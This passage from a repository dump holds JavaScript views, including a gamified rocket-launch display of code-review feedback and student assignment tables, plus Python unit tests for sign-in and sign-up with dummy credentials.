app.uiFactory.createModal(\"select-review-student\", assignmentName + \" - Select Feedback to View\", modalBody, false);\n\t\tdocument.body.appendChild(modalData.modal);\n\n\t\tvar modalSpaceGame = app.modalContentManager.getModalContent(\"rocket-game\");\n\t\tvar modalSpaceGameData = app.uiFactory.createModal(\"select-review-student\", \"Rocket Test\", modalSpaceGame, false);\n\t\tdocument.body.appendChild(modalSpaceGameData.modal);\n\n\n\t\tvar submission = app.submissions.submissions[subIndex];\n\n\t\tvar currentFeedbacksIDs = [];\n\t\tfor (var i = 0;i< submission.feedbacks.length; i++)\n\t\t{\n\t\t\tif (submission.feedbacks[i].iteration_submitted === submission.iteration)\n\t\t\t{\n\t\t\t\tvar feedback = submission.feedbacks[i];\n\t\t\t\t// test if there are no feedback from a same user on a same iteration\n\t\t\t\tvar foundUser = false;\n\t\t\t\tfor (var j = 0; j< currentFeedbacksIDs.length; j++)\n\t\t\t\t{\n\t\t\t\t\tif (currentFeedbacksIDs[j].reviewer_id === feedback.reviewer_id && currentFeedbacksIDs[j].iteration_submitted === feedback.iteration_submitted)\n\t\t\t\t\t{\n foundUser = true;\n break;\n 
}\n\t\t\t\t}\n\t\t\t\tif(foundUser)\n\t\t\t\t{\n\t\t\t\t\tcurrentFeedbacksIDs[j] = i;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tcurrentFeedbacksIDs.push(i);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\n\n\t\tvar reviewDiv = document.getElementById(\"select-review-students-buttons\");\n\n\t\tfor (var i = 0; i < currentFeedbacksIDs.length; i++)\n\t\t{\n\t\t\tvar fbdata = submission.feedbacks[currentFeedbacksIDs[i]];\n\n\t\t\tvar reviewBtn = document.createElement(\"BUTTON\");\n\n\t\t\tif (fbdata.reviewer_role === \"student\")\n\t\t\t{\n\t\t\t\treviewBtn.innerHTML =\"Some Review by \" + fbdata.reviewer_name;\n\t\t\t}\n\n\t\t\telse\n\t\t\t{\n\t\t\t\treviewBtn.innerHTML =\"Review by the Lecturer \" + fbdata.reviewer_name;\n\t\t\t\treviewBtn.style=\"font-weight:bold\"\n\t\t\t}\n\n\n\n\t\t\treviewBtn.id = \"select-review-student-feedback-row#\" + submission.id + \"#\" + fbdata.reviewer_id + \"#\" + currentFeedbacksIDs[i];\n\n\n\t\t\treviewBtn.addEventListener(\"click\", function ()\n\t\t\t{\n\t\t\t\tvar parentNode = modalData.modal.parentNode;\n\t\t\t\tparentNode.removeChild(modalData.modal);\n\n\n\n\t\t\t\tmodalSpaceGameData.modal.style.display = \"block\";\n\n\t\t\t\tapp.submissions.codeViewState = \"Comments\";\n\t\t\t\tapp.submissions.reviewerIDToCodeView = parseInt(this.id.split('#')[2]);\n\t\t\t\tapp.submissions.submissionIDToCodeView = parseInt(this.id.split('#')[1]);\n\t\t\t\tapp.submissions.feedbackIndexToReview = parseInt(this.id.split('#')[3]);\n\n\t\t\t\tvar feedback = submission.feedbacks[app.submissions.feedbackIndexToReview];\n\n\t\t\t\tthat.setupRocketGame(modalSpaceGameData, feedback);\n\n\n\t\t\t});\n\n\t\t\treviewDiv.appendChild(reviewBtn);\n\t\t}\n\n\n\n\t\tmodalData.modal.style.display = \"block\";\n\t}\n\n\n\n\tshow()\n\t{\n\t\tsuper.show();\n\t}\n\n\tsetupRocketGame(gameModalData, feedback)\n\t{\n\t\tvar modalBody = gameModalData.modal;\n\t\tvar closeButtons = gameModalData.closes;\n\n\n\n console.log (\"feedback\", feedback);\n var whoReviewed = feedback.reviewer_role;\n\n\n\t\tvar issues = [];\n\n\t\tvar review = feedback[\"review\"];\n\t\tfor (var filename in review)\n\t\t{\n\t\t\tvar fileReview = review[filename];\n\t\t\tfor (var bitID in fileReview)\n\t\t\t{\n\t\t\t\tif (fileReview[bitID].review_type === \"Issue\")\n\t\t\t\t{\n\t\t\t\t\tvar issue = {};\n\t\t\t\t\tissue.file = filename;\n\t\t\t\t\tissue.review = fileReview[bitID].review;\n\t\t\t\t\tissues.push(issue)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\n\t\t// Determines the fate of the ship.\n\t\tvar shipFate = \"fly off\";\n\t\tif (issues.length >= this.spaceShipLives)\n\t\t{\n\t\t\tshipFate = \"fly and explode\";\n\t\t}\n\n\t\tif (issues.length >= this.spaceShipLives * 2)\n\t\t{\n\t\t\tshipFate = \"explode\";\n\t\t}\n\n\t\t//Do prep here\n\n\t\tthis.startCountdown(shipFate, issues, closeButtons, whoReviewed)\n\n\n\t}\n\n\tstartCountdown(shipFate, issues, closeButtons, whoReviewed)\n\t{\n\t\tvar that = this;\n\t\tvar messageLog = document.getElementById(\"messages-window\");\n\n\t\tvar prestartMessage = document.createElement(\"LABEL\");\n\n\t\tif (whoReviewed === \"student\"){\n\t\t\tprestartMessage.innerHTML = \"The spaceship simulation will start in:\";\n\t\t}\n\n\t\telse\n\t\t{\n\t\t\tprestartMessage.innerHTML = \"The launch of the spaceship will commence in:\";\n\t\t}\n\n\t\tmessageLog.appendChild(prestartMessage);\n\n\t\tvar timeLeft = 10;\n\t\tvar timer = setInterval(function()\n\t\t\t{\n\t\t\t\tvar countMessage = document.createElement(\"LABEL\");\n\t\t\t\tcountMessage.innerHTML = timeLeft;\n\t\t\t\tmessageLog.appendChild( 
document.createElement(\"BR\"));\n\t\t\t\tmessageLog.appendChild(countMessage);\n\n\n\t\t\t\ttimeLeft--;\n\n\n\t\t\t\tif (timeLeft === 5){\n\t\t\t\t\tapp.audioManager.playSound(\"space-ship-flight.wav\", 1);\n\t\t\t\t}\n\n\n\t\t\t\tif (timeLeft === -1)\n\t\t\t\t{\n\t\t\t\t\tclearInterval(timer);\n\t\t\t\t\tthat.rocketFlight(shipFate,issues, messageLog, closeButtons, whoReviewed)\n                }\n\n\t\t\t}, 1000);\n\n\t\t\t// Clicking the close buttons should bring the user back to the code view\n\t\t    for (var i = 0; i <closeButtons.length;i++){\n\t\t\tcloseButtons[i].addEventListener(\"click\", function ()\n\t\t\t{\n\t\t\t\tapp.viewManager.goToView(app.viewManager.VIEW.CODE_VIEW);\n\t\t\t\tclearInterval(timer);\n\t\t\t});\n            }\n\n\n\n\t}\n\n\trocketFlight(shipFate,issues, messageLog, closeButtons, whoReviewed)\n\t{\n\t\tvar that = this;\n\t\tvar rocket = document.getElementById(\"spaceship-span\");\n\t\tvar rocketSprite = document.getElementById(\"rocket-image\");\n\n\n\t\tif (shipFate === \"explode\")\n\t\t{\n\t\t\t//Explode\n\t\t\trocketSprite.src=\"resources/images/explosion.png\";\n\t\t\trocketSprite.classList.remove(\"rocket-image\");\n\t\t\trocketSprite.classList.add(\"explosion-image\");\n\n\t\t\tif(whoReviewed === \"student\")\n\t\t\t{\n\t\t\t\tvar lastmessage = document.createElement(\"LABEL\");\n\t\t\t\tlastmessage.innerHTML = \"Simulation was cancelled due to an excessive number of errors.\";\n\t\t\t\tlastmessage.style.color = \"red\";\n\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\tmessageLog.appendChild(lastmessage)\n\t\t\t}\n\n\t\t\telse{\n\t\t\t\tvar lastmessage = document.createElement(\"LABEL\");\n\t\t\t\tlastmessage.innerHTML = \"Contact was lost. No signal from the ship. We lost it.\";\n\t\t\t\tlastmessage.style.color = \"red\";\n\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\tmessageLog.appendChild(lastmessage)\n\t\t\t}\n\n\t\t}\n\n\t\telse\n\t\t{\n\t\t\trocket.classList.add(\"fly\");\n\t\t\trocketSprite.src=\"resources/images/spaceship-flying.png\";\n\n\t\t\tvar explosionCount = 0;\n\t\t\tvar flyStages = 0;\n\n\t\t\tvar timer = setInterval(function()\n\t\t\t\t{\n\t\t\t\t\tflyStages++;\n\n\t\t\t\t\tif (issues.length > explosionCount)\n\t\t\t\t\t{\n\t\t\t\t\t\tvar issue = issues[explosionCount];\n\t\t\t\t\t\texplosionCount++;\n\n\t\t\t\t\t\tvar message = document.createElement(\"LABEL\");\n\t\t\t\t\t\tmessage.innerHTML = \"Error #\" + explosionCount +\" has occurred in file \" + issue.file;\n\t\t\t\t\t\tmessage.style.color = \"red\";\n\n\n\t\t\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\t\t\tmessageLog.appendChild(message);\n\n\t\t\t\t\t\tif (explosionCount < 3)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\trocketSprite.src = \"resources/images/spaceship-damage\"+explosionCount+\".png\";\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\telse\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t//Explode\n\t\t\t\t\t\t\trocketSprite.src=\"resources/images/explosion.png\";\n\n\t\t\t\t\t\t\trocketSprite.classList.add(\"explosion-image\");\n\t\t\t\t\t\t\trocketSprite.classList.remove(\"rocket-image\");\n\n\t\t\t\t\t\t\tif(whoReviewed === \"student\")\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tvar lastmessage = document.createElement(\"LABEL\");\n\t\t\t\t\t\t\t\tlastmessage.innerHTML = \"Simulation has ended with failure.\";\n\t\t\t\t\t\t\t\tlastmessage.style.color = \"red\";\n\t\t\t\t\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\t\t\t\t\tmessageLog.appendChild(lastmessage)\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\telse{\n\t\t\t\t\t\t\t\tvar lastmessage = 
document.createElement(\"LABEL\");\n\t\t\t\t\t\t\t\tlastmessage.innerHTML = \"Contact was lost. No signal from the ship. We lost it.\";\n\t\t\t\t\t\t\t\tlastmessage.style.color = \"red\";\n\t\t\t\t\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\t\t\t\t\tmessageLog.appendChild(lastmessage)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tif (flyStages === 3){\n\n\t\t\t\t\t\t\trocket.classList.add(\"flyOff\");\n\n\t\t\t\t\t\t\tif(whoReviewed === \"student\")\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tvar lastmessage = document.createElement(\"LABEL\");\n\t\t\t\t\t\t\t\tlastmessage.innerHTML = \"Simulation has ended with success.\";\n\t\t\t\t\t\t\t\tlastmessage.style.color = \"white\";\n\t\t\t\t\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\t\t\t\t\tmessageLog.appendChild(lastmessage)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\telse\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tvar lastmessage = document.createElement(\"LABEL\");\n\t\t\t\t\t\t\t\tlastmessage.innerHTML = \"The spaceship has passed the atmosphere and successfully reached orbit.\";\n\t\t\t\t\t\t\t\tlastmessage.style.color = \"white\";\n\t\t\t\t\t\t\t\tmessageLog.appendChild(document.createElement(\"BR\"));\n\t\t\t\t\t\t\t\tmessageLog.appendChild(lastmessage)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\n\t\t\t\t\tif (flyStages === 5)\n\t\t\t\t\t{\n\t\t\t\t\t\tcloseButtons[0].click();\n\t\t\t\t\t}\n\n\n\t\t\t\t}, 3000);\n\n\n\n\t\t\t\t// Clicking the close buttons should bring the user back to the code view\n\t\t\t    for (var i = 0; i <closeButtons.length;i++){\n\t\t\t\tcloseButtons[i].addEventListener(\"click\", function ()\n\t\t\t\t{\n\t\t\t\t\tapp.viewManager.goToView(app.viewManager.VIEW.CODE_VIEW);\n\t\t\t\t\tclearInterval(timer);\n\t\t\t\t});\n\t\t\t}\n\n\n\t\t}\n\n\n\n\n\n\n\n\n\t}\n\n}\n"
},
{
"alpha_fraction": 0.6417797803878784,
"alphanum_fraction": 0.6496983170509338,
"avg_line_length": 24.873170852661133,
"blob_id": "031a94c41b465e7ab9dbffd99f4d7f395e35fcf2",
"content_id": "18c81fbf298db109a4a47e6da96646aed6618429",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5304,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 205,
"path": "/views/assignments-student/AssignmentsStudentView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Responsible for displaying what the user sees**/\nclass AssignmentsStudentView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.ASSIGNMENTS_STUDENT;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\n\t\tthis.tickAreas = {}\n\t}\n\n\n\tonNotify (model, messageType)\n\t{\n\t\tvar that = this;\n\n\t\tvar assignmentTable = document.getElementById(\"student-assignments-table\");\n\t\tvar reviewDeadlineTable = document.getElementById(\"student-assignments-review-deadlines-table\");\n\n\t\t// Update the table of assessments\n\t\tif (messageType === net.messageHandler.types.GET_ASSIGNMENTS_SUCCESSFUL ||\n\t\t\tmessageType === net.messageHandler.types.ASSIGNMENT_DELETE_SUCCESSFUL )\n\t\t{\n\t\t\t// remove all data in there.\n\t\t\tvar rowCount = assignmentTable.rows.length;\n\t\t\twhile(--rowCount)\n\t\t\t{\n\t\t\t\tassignmentTable.deleteRow(rowCount);\n\t\t\t}\n\n\n\n\t\t\tvar assignments = model.assignments;\n\n\t\t\tfor (var i = 0; i < assignments.length; i++)\n\t\t\t{\n\t\t\t\tvar status = assignments[i].status;\n\t\t\t\tvar row = 0;\n\t\t\t\tvar dlTime = 0;\n\t\t\t\tvar dlDate = 0;\n\n\t\t\t\tif (status === \"normal\" || status === \"submission_soon\")\n\t\t\t\t{\n\t\t\t\t\trow = assignmentTable.insertRow(assignmentTable.rows.length);\n\t\t\t\t\tdlTime = assignments[i].deadlineTime;\n\t\t\t\t\tdlDate = assignments[i].deadlineDate;\n\t\t\t\t}\n\n\t\t\t\telse{\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\n\n\t\t\t\tvar cell0 = row.insertCell(0);\n\t\t\t\tvar cell1 = row.insertCell(1);\n\t\t\t\tvar cell2 = row.insertCell(2);\n\t\t\t\tvar cell3 = row.insertCell(3);\n\t\t\t\tvar cell4 = row.insertCell(4);\n\n\t\t\t\tvar img = document.createElement(\"IMG\");\n\t\t\t\timg.src = \"resources/images/upload-button.png\";\n\t\t\t\timg.id = \"upload-assignment-button##\" + assignments[i].id;\n\t\t\t\timg.className = \"picture-button\";\n\t\t\t\timg.addEventListener(\"click\", function()\n\t\t\t\t{\n\t\t\t\t\tvar id = parseInt(this.id.split('##')[1]);\n\t\t\t\t\tthat.controller.createSubmitAssignmentModal(id);\n\t\t\t\t});\n\t\t\t\tcell0.appendChild(img);\n\n\n\t\t\t\tcell1.innerHTML = assignments[i].name;\n\t\t\t\tcell2.innerHTML = dlDate;\n\t\t\t\tcell3.innerHTML = dlTime;\n\n\t\t\t\tcell4.id = \"assignment-submission##\" + assignments[i].id;\n\t\t\t\tthis.tickAreas[assignments[i].id] = cell4;\n\t\t\t}\n\t\t}\n\n\n\t\telse if (messageType === net.messageHandler.types.GET_SUBMISSIONS_SUCCESSFUL ||\n\t\t\t\tmessageType === net.messageHandler.types.SUBMIT_ASSIGNMENT_SUCCESSFUL)\n\t\t{\n\t\t\t// Clean all ticks\n\t\t\tfor(var k in this.tickAreas) {\n\t\t\t\tthis.tickAreas[k].innerHTML = \"\";\n\t\t\t}\n\n\t\t\t// Optimise submissions - we need them as dict of assignment_id linking to a freshest submission_id\n\t\t\tvar organisedSubData = {};\n\t\t\tfor (var i = 0; i < model.submissions.length; i++)\n\t\t\t{\n\t\t\t\tif (model.submissions[i].userID === app.user.id)\n\t\t\t\t{\n\t\t\t\t\torganisedSubData[model.submissions[i].assignmentID] = model.submissions[i];\n\t\t\t\t}\n\t\t\t}\n\n\n\t\t\tfor(var assID in organisedSubData)\n\t\t\t{\n\n \t\t\t\tvar subID = organisedSubData[assID].id;\n\n \t\t\t\tvar cell = this.tickAreas[assID];\n\n \t\t\t\tif(cell !== undefined)\n \t\t\t\t{\n\t\t\t\t\t//Set tick image and button.\n\t\t\t\t\tvar subImg = document.createElement(\"IMG\");\n\t\t\t\t\tsubImg.src = \"resources/images/tick.png\";\n\t\t\t\t\tsubImg.className = \"picture-button\";\n\t\t\t\t\tsubImg.id = \"submission-picture##\" + 
subID;\n\n\t\t\t\t\tsubImg.addEventListener(\"click\", function()\n\t\t\t\t\t{\n\t\t\t\t\t\tvar id = parseInt(this.id.split('##')[1]);\n\t\t\t\t\t\talert(\"Hi there!\");\n\t\t\t\t\t});\n\n\t\t\t\t\tcell.appendChild(subImg);\n \t\t\t\t}\n\n \t\t\t\t// Let's see if there is a cell where I can put the version in.\n\t\t\t\tvar cell = document.getElementById(\"assignment-submission-iteration##\" + assID);\n \t\t\t\tif (cell)\n \t\t\t\t{\n \t\t\t\t\tcell.innerHTML = organisedSubData[parseInt(assID)].iteration;\n\t\t\t\t}\n\n\t\t\t}\n\t\t}\n\n\t\t// update review section\n\t\trowCount = reviewDeadlineTable.rows.length;\n\t\twhile(--rowCount)\n\t\t{\n\t\t\treviewDeadlineTable.deleteRow(rowCount);\n\t\t}\n\n\t\tvar assignments = app.assignments.assignments;\n\n\t\tfor (var i = 0; i < assignments.length; i++)\n\t\t{\n\n\t\t\t\tif (assignments[i].status === \"review\" || assignments[i].status === \"review_end_soon\")\n\t\t\t{\n\n\t\t\t\t// A student should not be able to resubmit code if they have not submitted it initially.\n\t\t\t\tvar submissions = app.submissions.submissions;\n\t\t\t\tvar submissionPresent = false;\n\t\t\t\tvar submission = {};\n\n\t\t\t\tfor (var j = 0; j < submissions.length; j++)\n\t\t\t\t{\n\t\t\t\t\tif (submissions[j].assignmentID === assignments[i].id)\n\t\t\t\t\t{\n\t\t\t\t\t\tsubmissionPresent = true;\n\t\t\t\t\t\tsubmission = submissions[j];\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tif (submissionPresent === false)\n\t\t\t\t{\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\n\n\t\t\t\tvar row = reviewDeadlineTable.insertRow(reviewDeadlineTable.rows.length);\n\n\t\t\t\tvar cell0 = row.insertCell(0);\n\t\t\t\tvar cell1 = row.insertCell(1);\n\t\t\t\tvar cell2 = row.insertCell(2);\n\t\t\t\tvar cell3 = row.insertCell(3);\n\t\t\t\tvar cell4 = row.insertCell(4);\n\n\t\t\t\tvar img = document.createElement(\"IMG\");\n\t\t\t\timg.src = \"resources/images/upload-button.png\";\n\t\t\t\timg.id = \"upload-assignment-button##\" + assignments[i].id;\n\t\t\t\timg.className = \"picture-button\";\n\t\t\t\timg.addEventListener(\"click\", function()\n\t\t\t\t{\n\t\t\t\t\tvar id = parseInt(this.id.split('##')[1]);\n\t\t\t\t\tthat.controller.createSubmitAssignmentModal(id);\n\t\t\t\t});\n\t\t\t\tcell0.appendChild(img);\n\n\t\t\t\tcell1.innerHTML = assignments[i].name;\n\t\t\t\tcell2.innerHTML = assignments[i].reviewTillDate;\n\t\t\t\tcell3.innerHTML = assignments[i].reviewTillTime;\n\n\t\t\t\tcell4.id = \"assignment-submission-iteration##\" + assignments[i].id;\n\t\t\t\tcell4.innerHTML = submission.iteration;\n\t\t\t}\n\t\t}\n\t}\n\n\tshow()\n\t{\n\t\tsuper.show();\n\t}\n}\n"
},
{
"alpha_fraction": 0.48698481917381287,
"alphanum_fraction": 0.48915401101112366,
"avg_line_length": 26.939393997192383,
"blob_id": "ed4ddd21ecd9488743398ec681f4537bfacb9209",
"content_id": "eaff22d87651d56145cbb642212ff61d3cf71c69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 33,
"path": "/js/Tracker.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class Tracker\n{\n constructor(id, date, htmlName, userID)\n {\n this.name = id;\n this.time = date;\n this.type = htmlName;\n this.userID = userID;\n }\n logThis()\n {\n console.log(\"at \" + this.format_date(this.time) + \" User \" + this.userID + \" pressed \" + this.name + \" which is of type \" + this.type);\n }\n logAll(trackArr)\n {\n for (var i = 0; i < trackArr.length; i++)\n {\n console.log(\"at \" + this.format_date(trackArr[i].time) + \" User \" + this.userID + \" pressed \" + trackArr[i].name + \" which is of type \" + trackArr[i].type);\n }\n }\n format_date(d)\n {\n var dformat;\n dformat = [d.getDate(),\n d.getMonth()+1,\n d.getFullYear()].join('/')+' '+\n [d.getHours(),\n d.getMinutes(),\n d.getSeconds(),\n d.getMilliseconds()].join(':');\n return dformat;\n }\n}\n"
},
{
"alpha_fraction": 0.5893223881721497,
"alphanum_fraction": 0.5893223881721497,
"avg_line_length": 19.29166603088379,
"blob_id": "4f6336fceaba35ff46a8d6cb58d925a204a04b8c",
"content_id": "12dcb2dd2cbfffbf601a8beb4c798e9c51f9c36f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 974,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 48,
"path": "/tests/test_signin.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import sys\nsys.path.append('..\\py')\n\nimport unittest\nfrom user_manager import UserManager\n\nclass TestSignin(unittest.TestCase):\n \"\"\"Test for Signin.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Called before everything. (setup)\"\"\"\n print(\"setUpClass\")\n\n\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Called after everything.(clean)\"\"\"\n print(\"tearDownClass\")\n\n\n\n def setUp(self):\n \"\"\"Called at the start of every test. (setup)\"\"\"\n print(\"setUp\")\n\n\n\n def tearDown(self):\n \"\"\"Called after every test (clean up).\"\"\"\n print(\"tearDown\")\n\n\n\n def test_singin(self):\n \"\"\".\"\"\"\n print(\"test_singin\")\n #returns enum USER_DOESNT_EXIST, DETAILS_INCORRECT, OK\n result = user_manager.signin(\"jack\",\"password123\")\n self.assertTrue(result)\n\n result = user_manager.signin(\"jack\",\"password123\")\n self.assertTrue(result)\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.5294532775878906,
"alphanum_fraction": 0.5305114388465881,
"avg_line_length": 25.009174346923828,
"blob_id": "49ad602a4f715275a3032b04e268d225a907bc7b",
"content_id": "8ba9464e5458e67bb95852ab98dd71cbefcc2d43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2835,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 109,
"path": "/tests/test_signinup.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import sys\nsys.path.append('/app/py')\n\nimport unittest\nfrom user_manager import UserManager\n\nclass TestSignin(unittest.TestCase):\n \"\"\"Test for Signin.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Called before everything. (setup)\"\"\"\n print(\"setUpClass\")\n cls.user_manager = UserManager()\n cls.user = {\n 'name': 'Libor',\n 'surname': 'Zachoval',\n 'email': '[email protected]',\n 'role': 'Admin',\n 'password': 'password'\n }\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Called after everything.(clean)\"\"\"\n print(\"tearDownClass\")\n cls.user_manager.deleteuser(cls.user)\n\n\n\n def setUp(self):\n \"\"\"Called at the start of every test. (setup)\"\"\"\n print(\"setUp\")\n\n def tearDown(self):\n \"\"\"Called after every test (clean up).\"\"\"\n print(\"tearDown\")\n\n\n def test_a_signup(self):\n \"\"\"Test1 tests for True by adding the exact user into DB.\n ***Test2 tests for False by using right email but wrong fields.\n ***Test3 tests for False by using a made up email.\"\"\"\n print(\"test_signup\")\n\n user = self.user\n self.user_manager.signup(user)\n self.signup(user, True)\n\n user = {\n 'name': 'L',\n 'surname': 'Z',\n 'email': '[email protected]',\n 'role': 'A',\n 'password': 'p'\n }\n\n self.signup(user, False)\n\n user = {\n 'name': 'L',\n 'surname': 'Z',\n 'email': 'madeupemail',\n 'role': 'A',\n 'password': 'p'\n }\n\n self.signup(user, False)\n\n def signup(self, user, expected):\n result = self.user_manager.getuser(user)\n if (result != \"USER_DOESNT_EXIST\"):\n self.checkuser(user, result, expected, list(user.keys()))\n else:\n self.assertTrue(False == expected)\n\n def checkuser(self, user, result, expected, fields):\n testPassed = True\n\n for field in fields:\n if (user[field] != result[field]):\n testPassed = False\n break\n\n self.assertTrue(testPassed == expected)\n\n\n\n def test_b_singin(self):\n \"\"\".\"\"\"\n print(\"test_singin\")\n #returns enum USER_DOESNT_EXIST, DETAILS_INCORRECT, OK\n user = {\"email\":\"jack\", \"password\":\"password123\"}\n self.singin(user, \"USER_DOESNT_EXIST\")\n\n user = {\"email\":\"[email protected]\",\"password\":\"wrongPassword\"}\n self.singin(user, \"DETAILS_INCORRECT\")\n\n user = {\"email\":\"[email protected]\",\"password\":\"password\"}\n self.singin(user, \"signin_successful\")\n\n def singin(self, user, expected):\n result = self.user_manager.signin(user)\n print(result)\n self.assertTrue(result == expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.6547472476959229,
"alphanum_fraction": 0.6559802889823914,
"avg_line_length": 19.794872283935547,
"blob_id": "18a2e931cf9876399ed6c21457e177f51e0b5b0c",
"content_id": "6e44fef14f5c8319a6335e2f2f4325e400f1261d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 811,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 39,
"path": "/js/Model.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Superclass that models extend from**/\nclass Model\n{\n\tconstructor()\n\t{\n\t\tthis.observers=[];\n\t}\n\n\taddObserver (observer, messageType)\n\t{\n\t\tif (!(messageType in this.observers))\n\t\t{\n\t\t\tthis.observers[messageType] = [];\n\t\t}\n\n\t\tthis.observers[messageType].push(observer);\n\t}\n\n\t/**Call this whenever the model changes (in this case the rating of the film)**/\n\tnotify (messageType)\n\t{\n\n\n\t\tif (this.observers[messageType] !== undefined)\n\t\t{\n\t\t\tfor (var i = 0; i < this.observers[messageType].length; i++)\n\t\t\t{\n\t\t\t\tthis.observers[messageType][i].onNotify(this, messageType);\n\t\t\t}\n\t\t}\n\n\t\t/*else\n\t\t{\n\t\t\tconsole.log(\"Trying to notify a view that doesn't exist. \" +\n\t\t\t\t\"Check that the correct model is assigned the right observer in App.js\");\n\t\t\tconsole.log(\"If all works as intended - ignore the message\");\n\t\t}*/\n\t}\n}\n"
},
{
"alpha_fraction": 0.6476733088493347,
"alphanum_fraction": 0.6571699976921082,
"avg_line_length": 17.803571701049805,
"blob_id": "644d7080d06b4892322b30afae9b6f93f1e58bab",
"content_id": "3c92e1a31dd059bdd1a0da936232157870488af4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1053,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 56,
"path": "/views/see-standards-teacher/SeeStandardsTeacherView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Responsible for displaying what the user sees**/\nclass SeeStandardsTeacherView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.SEE_STANDARDS_TEACHER;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\t}\n\n\tonNotify (model, messageType)\n\t{\n\t\tif ( messageType === net.messageHandler.types.GET_STANDARD_SUCCESSFUL)\n\t\t{\n\t\t\tvar table = document.getElementById(\"standards-table\");\n\n\t\t\t// update review section\n\t\t\tvar rowCount = table.rows.length;\n\t\t\twhile(--rowCount)\n\t\t\t{\n\t\t\t\ttable.deleteRow(rowCount);\n\t\t\t}\n\n\n\t\t\tfor (var key in model.standards)\n\t\t\t{\n\t\t\t\tvar substandard = model.standards[key];\n\n\n\t\t\t\tfor(var i =0; i< substandard.length; i++)\n\t\t\t\t{\n\t\t\t\t\tvar row = table.insertRow(table.rows.length);\n\n\t\t\t\t\tvar cell0 = row.insertCell(0);\n\t\t\t\t\tvar cell1 = row.insertCell(1);\n\t\t\t\t\tvar cell2 = row.insertCell(2);\n\n\n\t\t\t\t\tcell0.innerHTML = substandard[i].category;\n\t\t\t\t\tcell1.innerHTML = substandard[i].subCategory;\n\t\t\t\t\tcell2.innerHTML = substandard[i].description;\n\t\t\t\t}\n\t\t\t}\n\n\t\t}\n\n\t}\n\n\n\tshow()\n\t{\n\t\tsuper.show();\n\t}\n}\n"
},
{
"alpha_fraction": 0.6599738001823425,
"alphanum_fraction": 0.6621562838554382,
"avg_line_length": 24.175825119018555,
"blob_id": "de4821001f0732184eb8fafab69e185159f828eb",
"content_id": "8f7eeba700a7fdbf93ecef5955efe9b011476bfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 2291,
"license_type": "no_license",
"max_line_length": 210,
"num_lines": 91,
"path": "/views/code-view/code-view.html",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
